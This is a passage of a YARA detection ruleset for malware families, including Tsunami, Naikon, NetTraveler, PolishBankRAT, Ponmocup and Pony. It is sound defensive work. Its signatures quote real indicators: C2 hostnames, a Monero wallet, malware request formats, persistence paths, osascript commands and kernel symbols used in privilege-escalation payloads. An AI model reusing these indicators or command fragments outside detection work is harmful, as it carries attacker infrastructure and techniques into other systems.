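        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
    strings:
        $a = "ZN8CUtility7DeCryptEPciPKci"
        $b = "ZN13CThreadAttack5StartEP11CCmdMessage"
    condition:
        all of them
}

// Mr.Black bot: name plus its beacon format string.
rule LinuxMrBlack {
    meta:
        Author = "@benkow_"
        Date = "2014/09/12"
        Description = "Strings inside"
        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
    strings:
        $a = "Mr.Black"
        $b = "VERS0NEX:%s|%d|%d|%s"
    condition:
        $a and $b
}

// Tsunami/Kaiten IRC bot: any one of its IRC PRIVMSG/NOTICE format strings.
rule LinuxTsunami {
    meta:
        Author = "@benkow_"
        Date = "2014/09/12"
        Description = "Strings inside"
        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
    strings:
        $a = "PRIVMSG %s :[STD]Hitting %s"
        $b = "NOTICE %s :TSUNAMI <target> <secs>"
        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
    condition:
        $a or $b or $c
}

// Linux kernel symbol names typically referenced by LKM rootkits (syscall table entries,
// kobject/list helpers). NOTE(review): these are ordinary kernel symbols, so unstripped kernel
// images, System.map files and legitimate modules can also reach "9 of them" — scope the scan.
rule rootkit {
    meta:
        author="xorseed"
        reference= "https://stuff.rop.io/"
    strings:
        $sys1 = "sys_write" nocase ascii wide
        $sys2 = "sys_getdents" nocase ascii wide
        $sys3 = "sys_getdents64" nocase ascii wide
        $sys4 = "sys_getpgid" nocase ascii wide
        $sys5 = "sys_getsid" nocase ascii wide
        $sys6 = "sys_setpgid" nocase ascii wide
        $sys7 = "sys_kill" nocase ascii wide
        $sys8 = "sys_tgkill" nocase ascii wide
        $sys9 = "sys_tkill" nocase ascii wide
        $sys10 = "sys_sched_setscheduler" nocase ascii wide
        $sys11 = "sys_sched_setparam" nocase ascii wide
        $sys12 = "sys_sched_getscheduler" nocase ascii wide
        $sys13 = "sys_sched_getparam" nocase ascii wide
        $sys14 = "sys_sched_setaffinity" nocase ascii wide
        $sys15 = "sys_sched_getaffinity" nocase ascii wide
        $sys16 = "sys_sched_rr_get_interval" nocase ascii wide
        $sys17 = "sys_wait4" nocase ascii wide
        $sys18 = "sys_waitid" nocase ascii wide
        $sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide
        $sys20 = "sys_rt_sigqueueinfo" nocase ascii wide
        $sys21 = "sys_prlimit64" nocase ascii wide
        $sys22 = "sys_ptrace" nocase ascii wide
        $sys23 = "sys_migrate_pages" nocase ascii wide
        $sys24 = "sys_move_pages" nocase ascii wide
        $sys25 = "sys_get_robust_list" nocase ascii wide
        $sys26 = "sys_perf_event_open" nocase ascii wide
        $sys27 = "sys_uname" nocase ascii wide
        $sys28 = "sys_unlink" nocase ascii wide
        // Fix: the original read "sys_unlikat", a misspelling that no kernel exports; the
        // intended symbol is sys_unlinkat.
        $sys29 = "sys_unlinkat" nocase ascii wide
        $sys30 = "sys_rename" nocase ascii wide
        $sys31 = "sys_read" nocase ascii wide
        $sys32 = "kobject_del" nocase ascii wide
        $sys33 = "list_del_init" nocase ascii wide
        $sys34 = "inet_ioctl" nocase ascii wide
    condition:
        9 of them
}

// Kernel symbols commonly resolved by local privilege-escalation payloads (cred handling,
// security_ops, task/fs roots). Same caveat as above: kernel images and symbol tables match too.
rule exploit {
    meta:
        author="xorseed"
        reference= "https://stuff.rop.io/"
    strings:
        $xpl1 = "set_fs_root" nocase ascii wide
        $xpl2 = "set_fs_pwd" nocase ascii wide
        $xpl3 = "__virt_addr_valid" nocase ascii wide
        $xpl4 = "init_task" nocase ascii wide
        $xpl5 = "init_fs" nocase ascii wide
        $xpl6 = "bad_file_ops" nocase ascii wide
        $xpl7 = "bad_file_aio_read" nocase ascii wide
        $xpl8 = "security_ops" nocase ascii wide
        $xpl9 = "default_security_ops" nocase ascii wide
        $xpl10 = "audit_enabled" nocase ascii wide
        $xpl11 = "commit_creds" nocase ascii wide
        $xpl12 = "prepare_kernel_cred" nocase ascii wide
        $xpl13 = "ptmx_fops" nocase ascii wide
        $xpl14 = "node_states" nocase ascii wide
    condition:
        7 of them
}

// Monero miner installer tied to a .kp domain: GUID, wallet address, domain and drop paths; any one fires.
rule nkminer_monero {
    meta:
        description = "Detects installer of Monero miner that points to a NK domain"
        author = "cdoman@alienvault.com"
        reference = "https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner"
        tlp = "white"
        license = "MIT License"
    strings:
        $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" nocase wide ascii
        $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" nocase wide ascii
        $c = "barjuok.ryongnamsan.edu.kp" nocase wide ascii
        $d = "C:\\SoftwaresInstall\\soft" nocase wide ascii
        $e = "C:\\Windows\\Sys64\\intelservice.exe" nocase wide ascii
        $f = "C:\\Windows\\Sys64\\updater.exe" nocase wide ascii
        $g = "C:\\Users\\Jawhar\\documents\\" nocase wide ascii
    condition:
        any of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.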
*/

import "pe"

// NSFree: two code fragments that walk memory looking for an MZ and then a PE header.
rule NSFreeCode : NSFree Family {
    meta:
        description = "NSFree code features"
        author = "Seth Hardy"
        last_modified = "2014-06-24"
    strings:
        // push ebx/esi/edi, then cmp word ptr [eax], 'MZ' (4D 5A)
        $ = { 53 56 57 66 81 38 4D 5A }
        // four nops, then cmp dword ptr [edi], "PE\0\0" (50 45 00 00)
        $ = { 90 90 90 90 81 3F 50 45 00 00 }
    condition:
        all of them
}

// NSFree identifying strings; the hex pattern is the DOS-stub text "This program canno"
// XORed with 0x58 (e.g. 0c ^ 58 = 'T', 30 ^ 58 = 'h').
rule NSFreeStrings : NSFree Family {
    meta:
        description = "NSFree Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-24"
    strings:
        $ = "\\MicNS\\" nocase
        $ = "NSFreeDll" wide ascii
        // xor 0x58 dos stub
        $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
    condition:
        any of them
}

// Family umbrella: either the code or the string rule above.
rule NSFree : Family {
    meta:
        description = "NSFree"
        author = "Seth Hardy"
        last_modified = "2014-06-24"
    condition:
        NSFreeCode or NSFreeStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Naikon: three instruction sequences from its string-decryption routine (all required).
rule NaikonCode : Naikon Family {
    meta:
        description = "Naikon code features"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        // decryption
        $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eax, 1fh
        $ = { 35 5A 01 00 00} // xor eax, 15ah
        $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
    condition:
        all of them
}

// Naikon identifying strings (user-agent, URI fragments, drop paths); any one fires.
rule NaikonStrings : Naikon Family {
    meta:
        description = "Naikon Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    strings:
        $ = "NOKIAN95/WEB"
        $ = "/tag=info&id=15"
        $ = "skg(3)=&3.2d_u1"
        $ = "\\Temp\\iExplorer.exe"
        $ = "\\Temp\\\"TSG\""
    condition:
        any of them
}

// Family umbrella: either the code or the string rule above.
rule Naikon : Family {
    meta:
        description = "Naikon"
        author = "Seth Hardy"
        last_modified = "2014-06-25"
    condition:
        NaikonCode or NaikonStrings
}

// Naikon backdoor: PE under 1000KB with one high-confidence C2/request string ($x*) or
// seven of the weaker protocol/log strings ($s*). Two samples are listed under the same
// "hash" meta key.
rule Backdoor_Naikon_APT_Sample1 {
    meta:
        description = "Detects backdoors related to the Naikon APT"
        author = "Florian Roth"
        reference = "https://goo.gl/7vHyvh"
        date = "2015-05-14"
        hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
        hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
    strings:
        $x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
        $x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
        $x2 = "greensky27.vicp.net" fullword ascii
        $x3 = "\\tempvxd.vxd.dll" fullword wide
        $x4 = "otna.vicp.net" fullword ascii
        $x5 = "smithking19.gicp.net" fullword ascii
        $s1 = "User-Agent: webclient" fullword ascii
        $s2 = "\\User.ini" fullword ascii
        $s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
        $s4 = "\\UserProfile.dll" fullword wide
        $s5 = "Connection:Keep-Alive: %d" fullword ascii
        $s6 = "Referer: http://%s:%d/" fullword ascii
        $s7 = "%s %s %s %d %d %d " fullword ascii
        $s8 = "%s--%s" fullword wide
        $s9 = "Run File Success!" fullword wide
        $s10 = "DRIVE_REMOTE" fullword wide
        $s11 = "ProxyEnable" fullword wide
        $s12 = "\\cmd.exe" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) or 7 of ($s*) )
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// nAspyUpdate dropper: byte-wise decryption loop (xor then add with the key byte held in dl,
// write back, advance ecx, loop on esi).
rule nAspyUpdateCode : nAspyUpdate Family {
    meta:
        description = "nAspyUpdate code features"
        author = "Seth Hardy"
        last_modified = "2014-07-14"
    strings:
        // decryption loop in dropper
        $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
    condition:
        any of them
}

// nAspyUpdate identifying strings; any one fires.
rule nAspyUpdateStrings : nAspyUpdate Family {
    meta:
        description = "nAspyUpdate Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-14"
    strings:
        $ = "\\httpclient.txt"
        $ = "password <=14"
        $ = "/%ldn.txt"
        $ = "Kill You\x00"
    condition:
        any of them
}

// Family umbrella: either the code or the string rule above.
rule nAspyUpdate : Family {
    meta:
        description = "nAspyUpdate"
        author = "Seth Hardy"
        last_modified = "2014-07-14"
    condition:
        nAspyUpdateCode or nAspyUpdateStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// NetPass variant: all three version-info (EXIF) strings of the embedded driver, or any one of
// the NUL-delimited command strings.
rule NetpassStrings : NetPass Variant {
    meta:
        description = "Identifiers for netpass variant"
        author = "Katie Kleemola"
        last_updated = "2014-05-29"
    strings:
        $exif1 = "Device Protect ApplicatioN" wide
        $exif2 = "beep.sys" wide //embedded exe name
        $exif3 = "BEEP Driver" wide //embedded exe description
        $string1 = "\x00NetPass Update\x00"
        $string2 = "\x00%s:DOWNLOAD\x00"
        $string3 = "\x00%s:UPDATE\x00"
        $string4 = "\x00%s:uNINSTALL\x00"
    condition:
        all of ($exif*) or any of ($string*)
}

// Umbrella for the NetPass string rule.
rule NetPass : Variant {
    meta:
        description = "netpass variant"
        author = "Katie Kleemola"
        last_updated = "2014-07-08"
    condition:
        NetpassStrings
}

// NetTraveler DLL: C2 query strings and debug messages (the misspelling "currect" is the
// malware's own); any one fires.
rule NetTravStrings : NetTraveler Family {
    meta:
        description = "Identifiers for NetTraveler DLL"
        author = "Katie Kleemola"
        last_updated = "2014-05-20"
    strings:
        //network strings
        $ = "?action=updated&hostid="
        $ = "travlerbackinfo"
        $ = "?action=getcmd&hostid="
        $ = "%s?action=gotcmd&hostid="
        $ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext="
        //debugging strings
        $ = "\x00Method1 Fail!!!!!\x00"
        $ = "\x00Method3 Fail!!!!!\x00"
        $ = "\x00method currect:\x00"
        $ = /\x00\x00[\w\-]+ is Running!\x00\x00/
        $ = "\x00OtherTwo\x00"
    condition:
        any of them
}

// NetTraveler DLL: decorated (MSVC-mangled) export names of the injector component.
rule NetTravExports : NetTraveler Family {
    meta:
        description = "Export names for dll component"
        author = "Katie Kleemola"
        last_updated = "2014-05-20"
    strings:
        //dll component exports
        $ = "?InjectDll@@YAHPAUHWND__@@K@Z"
        $ = "?UnmapDll@@YAHXZ"
        $ = "?g_bSubclassed@@3HA"
    condition:
        any of them
}

// Family umbrella: exports, strings, or the related NetPass string rule.
rule NetTraveler : Family {
    meta:
        description = "Nettravelr"
        author = "Katie Kleemola"
        last_updated = "2014-07-08"
    condition:
        NetTravExports or NetTravStrings or NetpassStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// NionSpy file infector: valid PE (MZ at 0 and "PE\0\0" at e_lfanew) plus one variant marker.
rule NionSpy : win32 {
    meta:
        description = "Triggers on old and new variants of W32/NionSpy file infector"
        reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
    strings:
        $variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
        $variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
        $variant2013_string = "%s?cstorage=shell&comp=%s"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 1 of ($variant*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Trojanised notepad.exe: two embedded 32-hex-digit strings, either one fires.
rule TROJAN_Notepad {
    meta:
        Author = "RSA_IR"
        Date = "4Jun13"
        File = "notepad.exe v 1.1"
        MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
    strings:
        $s1 = "75BAA77C842BE168B0F66C42C7885997"
        $s2 = "B523F63566F407F3834BCC54AAA32524"
    condition:
        $s1 or $s2
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// OSX/Leverage.A: shell/osascript fragments it runs (serial-number lookup, login-item
// enumeration, icon removal) plus its UserEvent.app paths. All strings required.
rule leverage_a {
    meta:
        author = "earada@alienvault.com"
        version = "1.0"
        description = "OSX/Leverage.A"
        date = "2013/09"
    strings:
        $a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
        $a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
        $a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
        $script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
        $script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
        $script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
        $properties = "serverVisible \x00"
    condition:
        all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Odinaff (SWIFT-related): PDB name or the "Tyman32" export (needs the pe module imported
// above), combined with two of its session/message-loop imports.
rule Odinaff_swift : malware odinaff swift raw{
    meta:
        author = "@j0sm1"
        date = "2016/10/27"
        description = "Odinaff malware"
        reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-083006-4847-99"
        filetype = "binary"
    strings:
        $s1 = "getapula.pdb"
        $i1 = "wtsapi32.dll"
        $i2 = "cmpbk32.dll"
        $i3 = "PostMessageA"
        $i4 = "PeekMessageW"
        $i5 = "DispatchMessageW"
        $i6 = "WTSEnumerateSessionsA"
    condition:
        ($s1 or pe.exports("Tyman32")) and (2 of ($i*))
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Olyx (OS X): two "mov dword [eax+4]/[eax+8], imm32" pairs filling with 0x36 and 0x5C.
// NOTE(review): 0x36/0x5C are the HMAC ipad/opad bytes, so this presumably matches an
// inlined HMAC setup — a generic construct that other binaries may contain.
rule OlyxCode : Olyx Family {
    meta:
        description = "Olyx code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
    condition:
        any of them
}

// Olyx identifying string: its persistence path inside Automator.app.
rule OlyxStrings : Olyx Family {
    meta:
        description = "Olyx Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
    condition:
        any of them
}

// Family umbrella: either the code or the string rule above.
rule Olyx : Family {
    meta:
        description = "Olyx"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    condition:
        OlyxCode or OlyxStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Packer/protector section names and markers, searched only in the first 1024 bytes of a
// valid PE (where the section table lives). This identifies packing, not maliciousness.
// $s24 and $s46 are both ".packed" (harmless duplicate under "any of them"); very short
// atoms such as "MEW" and ".yP" are kept cheap only by the (0..1024) range.
rule suspicious_packer_section : packer PE {
    meta:
        author = "@j0sm1"
        date = "2016/10/21"
        description = "The packer/protector section names/keywords"
        reference = "http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/"
        filetype = "binary"
    strings:
        $s1 = ".aspack" wide ascii
        $s2 = ".adata" wide ascii
        $s3 = "ASPack" wide ascii
        $s4 = ".ASPack" wide ascii
        $s5 = ".ccg" wide ascii
        $s6 = "BitArts" wide ascii
        $s7 = "DAStub" wide ascii
        $s8 = "!EPack" wide ascii
        $s9 = "FSG!" wide ascii
        $s10 = "kkrunchy" wide ascii
        $s11 = ".mackt" wide ascii
        $s12 = ".MaskPE" wide ascii
        $s13 = "MEW" wide ascii
        $s14 = ".MPRESS1" wide ascii
        $s15 = ".MPRESS2" wide ascii
        $s16 = ".neolite" wide ascii
        $s17 = ".neolit" wide ascii
        $s18 = ".nsp1" wide ascii
        $s19 = ".nsp2" wide ascii
        $s20 = ".nsp0" wide ascii
        $s21 = "nsp0" wide ascii
        $s22 = "nsp1" wide ascii
        $s23 = "nsp2" wide ascii
        $s24 = ".packed" wide ascii
        $s25 = "pebundle" wide ascii
        $s26 = "PEBundle" wide ascii
        $s27 = "PEC2TO" wide ascii
        $s28 = "PECompact2" wide ascii
        $s29 = "PEC2" wide ascii
        $s30 = "pec1" wide ascii
        $s31 = "pec2" wide ascii
        $s32 = "PEC2MO" wide ascii
        $s33 = "PELOCKnt" wide ascii
        $s34 = ".perplex" wide ascii
        $s35 = "PESHiELD" wide ascii
        $s36 = ".petite" wide ascii
        $s37 = "ProCrypt" wide ascii
        $s38 = ".RLPack" wide ascii
        $s39 = "RCryptor" wide ascii
        $s40 = ".RPCrypt" wide ascii
        $s41 = ".sforce3" wide ascii
        $s42 = ".spack" wide ascii
        $s43 = ".svkp" wide ascii
        $s44 = "Themida" wide ascii
        $s45 = ".Themida" wide ascii
        $s46 = ".packed" wide ascii
        $s47 = ".Upack" wide ascii
        $s48 = ".ByDwing" wide ascii
        $s49 = "UPX0" wide ascii
        $s50 = "UPX1" wide ascii
        $s51 = "UPX2" wide ascii
        $s52 = ".UPX0" wide ascii
        $s53 = ".UPX1" wide ascii
        $s54 = ".UPX2" wide ascii
        $s55 = ".vmp0" wide ascii
        $s56 = ".vmp1" wide ascii
        $s57 = ".vmp2" wide ascii
        $s58 = "VProtect" wide ascii
        $s59 = "WinLicen" wide ascii
        $s60 = "WWPACK" wide ascii
        $s61 = ".yP" wide ascii
        $s62 = ".y0da" wide ascii
        $s63 = "UPX!" wide ascii
    condition:
        // DOS stub signature ("MZ") and PE signature ("PE\0\0" at e_lfanew), then any marker in the header area
        uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and ( for any of them : ( $ in (0..1024) ) )
}

// PittyTiger: one family marker ($pt*), one "trj:" log message ($trj*) and one of the author's
// characteristic misspellings ($odd*) must all be present.
rule PittyTiger {
    meta:
        author = " (@chort0)"
        description = "Detect PittyTiger Trojan via common strings"
    strings:
        $ptUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)" // missing minor digit
        $ptFC001 = "FC001" fullword
        $ptPittyTiger = "PittyTiger" fullword
        $trjHTMLerr = "trj:HTML Err." nocase fullword
        $trjworkFunc = "trj:workFunc start." nocase fullword
        $trjcmdtout = "trj:cmd time out." nocase fullword
        $trjThrtout = "trj:Thread time out." nocase fullword
        $trjCrPTdone = "trj:Create PT done." nocase fullword
        $trjCrPTerr = "trj:Create PT error: mutex already exists." nocase fullword
        $oddPippeFailed = "Create Pippe Failed!" fullword // extra 'p'
        $oddXferingFile = "Transfering File" fullword // missing 'r'
        $oddParasError = "put Paras Error:" fullword // abbreviated 'parameters'?
        $oddCmdTOutkilled = "Cmd Time Out..Cmd has been killed." fullword
    condition:
        (any of ($pt*)) and (any of ($trj*)) and (any of ($odd*))
}

// PolishBankRAT srservice component: x64 byte-wise XOR decode loop, gated on a valid PE header.
rule PolishBankRAT_srservice_xorloop {
    meta:
        author = "Booz Allen Hamilton Dark Labs"
        description = "Finds the custom xor decode loop for <PolishBankRAT_srservice>"
    strings:
        $loop = { 48 8B CD E8 60 FF FF FF 48 FF C3 32 44 1E FF 48 FF CF 88 43 FF }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $loop
}

// PolishBankRAT fdsvc component: x64 XOR loop (movzx/lea/xor/dec/jnz), gated on a valid PE header.
rule PolishBankRAT_fdsvc_xor_loop {
    meta:
        author = "Booz Allen Hamilton Dark Labs"
        description = "Finds the custom xor decode loop for <PolishBankRAT_fdsvc>"
    strings:
        $loop = {0F B6 42 FF 48 8D 52 FF 30 42 01 FF CF 75 F1}
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $loop
}

// PolishBankRAT fdsvc: eight constant fragments of its payload decoder. $str1 is the standard
// DOS-stub text present in nearly every PE, so it adds nothing beyond the header check.
rule PolishBankRAT_fdsvc_decode2 {
    meta:
        author = "Booz Allen Hamilton Dark Labs"
        description = "Find a constant used as part of a payload decoding function in PolishBankRAT_fdsvc"
    strings:
        $part1 = {A6 EB 96}
        $part2 = {61 B2 E2 EF}
        $part3 = {0D CB E8 C4}
        $part4 = {5A F1 66 9C}
        $part5 = {A4 80 CD 9A}
        $part6 = {F1 2F 46 25}
        $part7 = {2F DB 16 26}
        $part8 = {4B C4 3F 3C}
        $str1 = "This program cannot be run in DOS mode"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them
}

// PolishBankRAT fdsvc: transliterated Russian command words visible once the payload is decoded
// (so this is aimed at memory/unpacked images); four of seven required.
rule decoded_PolishBankRAT_fdsvc_strings {
    meta:
        author = "Booz Allen Hamilton Dark Labs"
        description = "Finds hard coded strings in PolishBankRAT_fdsvc"
    strings:
        $str1 = "ssylka" wide ascii
        $str2 = "ustanavlivat" wide ascii
        $str3 = "poluchit" wide ascii
        $str4 = "pereslat" wide ascii
        $str5 = "derzhat" wide ascii
        $str6 = "vykhodit" wide ascii
        $str7 = "Nachalo" wide ascii
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and 4 of ($str*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Ponmocup plug-ins in memory: "MZ\x90", 29 arbitrary bytes, then the plug-in version number as
// a little-endian word at offset 32 of the DOS header — each string's name is that version
// (e.g. 4C 04 = 0x044C = 1100, B1 04 = 0x04B1 = 1201).
rule Ponmocup : plugins memory {
    meta:
        description = "Ponmocup plugin detection (memory)"
        author = "Danny Heppener, Fox-IT"
        reference = "https://foxitsecurity.files.wordpress.com/2015/12/foxit-whitepaper_ponmocup_1_1.pdf"
    strings:
        $1100 = {4D 5A 90 [29] 4C 04}
        $1201 = {4D 5A 90 [29] B1 04}
        $1300 = {4D 5A 90 [29] 14 05}
        $1350 = {4D 5A 90 [29] 46 05}
        $1400 = {4D 5A 90 [29] 78 05}
        $1402 = {4D 5A 90 [29] 7A 05}
        $1403 = {4D 5A 90 [29] 7B 05}
        $1404 = {4D 5A 90 [29] 7C 05}
        $1405 = {4D 5A 90 [29] 7D 05}
        $1406 = {4D 5A 90 [29] 7E 05}
        $1500 = {4D 5A 90 [29] DC 05}
        $1501 = {4D 5A 90 [29] DD 05}
        $1502 = {4D 5A 90 [29] DE 05}
        $1505 = {4D 5A 90 [29] E1 05}
        $1506 = {4D 5A 90 [29] E2 05}
        $1507 = {4D 5A 90 [29] E3 05}
        $1508 = {4D 5A 90 [29] E4 05}
        $1509 = {4D 5A 90 [29] E5 05}
        $1510 = {4D 5A 90 [29] E6 05}
        $1511 = {4D 5A 90 [29] E7 05}
        $1512 = {4D 5A 90 [29] E8 05}
        $1600 = {4D 5A 90 [29] 40 06}
        $1601 = {4D 5A 90 [29] 41 06}
        $1700 = {4D 5A 90 [29] A4 06}
        $1800 = {4D 5A 90 [29] 08 07}
        $1801 = {4D 5A 90 [29] 09 07}
        $1802 = {4D 5A 90 [29] 0A 07}
        $1803 = {4D 5A 90 [29] 0B 07}
        $2001 = {4D 5A 90 [29] D1 07}
        $2002 = {4D 5A 90 [29] D2 07}
        $2003 = {4D 5A 90 [29] D3 07}
        $2004 = {4D 5A 90 [29] D4 07}
        $2500 = {4D 5A 90 [29] C4 09}
        $2501 = {4D 5A 90 [29] C5 09}
        $2550 = {4D 5A 90 [29] F6 09}
        $2600 = {4D 5A 90 [29] 28 0A}
        $2610 = {4D 5A 90 [29] 32 0A}
        $2700 = {4D 5A 90 [29] 8C 0A}
        $2701 = {4D 5A 90 [29] 8D 0A}
        $2750 = {4D 5A 90 [29] BE 0A}
        $2760 = {4D 5A 90 [29] C8 0A}
        $2810 = {4D 5A 90 [29] FA 0A}
    condition:
        // equivalent to "any of them" — every declared string is listed
        any of ($1100,$1201,$1300,$1350,$1400,$1402,$1403,$1404,$1405,$1406, $1500,$1501,$1502,$1505,$1506,$1507,$1508,$1509,$1510,$1511,$1512,$1600,$1601,$1700,$1800,$1801, $1802,$1803,$2001,$2002,$2003,$2004,$2500,$2501,$2550,$2600,$2610,$2700,$2701,$2750,$2760,$2810)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Ponmocup installer: byte patterns anchored at fixed file offsets (0x61F7C, 0x29F0), so this
// matches only the specific build the authors analysed and will miss any rebuilt variant.
rule Trj_Ponmocup {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
        description = "Ponmocup Installer"
    strings:
        $mz = { 4d 5a }
        $pac = { 48 8F BB 54 5F 3E 4F 4E }
        $unp = { 8B B8 7C 1F 46 00 33 C8 }
    condition:
        ($mz at 0) and ($pac at 0x61F7C) and ($unp at 0x29F0)
}

// Ponmocup downloader: VB5 marker, hard-coded torrent-site host and user-agent, all required.
rule Trj_Ponmocup_Downloader {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
        description = "Ponmocup Downloader"
    strings:
        $mz = { 4d 5a }
        $vb5 = "VB5" fullword ascii
        $tpb = "www.thepiratebay.org" fullword wide
        $ua = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1)" fullword wide
    condition:
        ($mz at 0) and ($vb5) and ($tpb) and ($ua)
}

// Ponmocup bot DLL: like Trj_Ponmocup, anchored at fixed offsets (0x8a50, 0x61f) and therefore
// build-specific.
rule Trj_Ponmocup_dll {
    meta:
        author = "Centro Criptológico Nacional (CCN)"
        ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
        description = "Ponmocup Bot DLL"
    strings:
        $mz = { 4d 5a }
        $pck = { 00 81 23 00 33 3E 00 00 3B F4 56 00 00 00 7D 00 }
        $upk = { 68 F4 14 00 10 A1 6C C0 02 10 FF D0 59 59 E9 7A }
    condition:
        ($mz at 0) and ($pck at 0x8a50) and ($upk at 0x61f)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Pony credential stealer: the GUID format string, the credential-file magic and the
// HTTP request skeleton must all be present. No PE header check, so memory and dumps match.
rule pony
{
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-08-16"
    description = "Identify Pony"
  strings:
    $s1 = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}"
    $s2 = "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0"
    $s3 = "POST %s HTTP/1.0"
    $s4 = "Accept-Encoding: identity, *;q=0"
    // User agents are kept for reference only; they are not part of the condition.
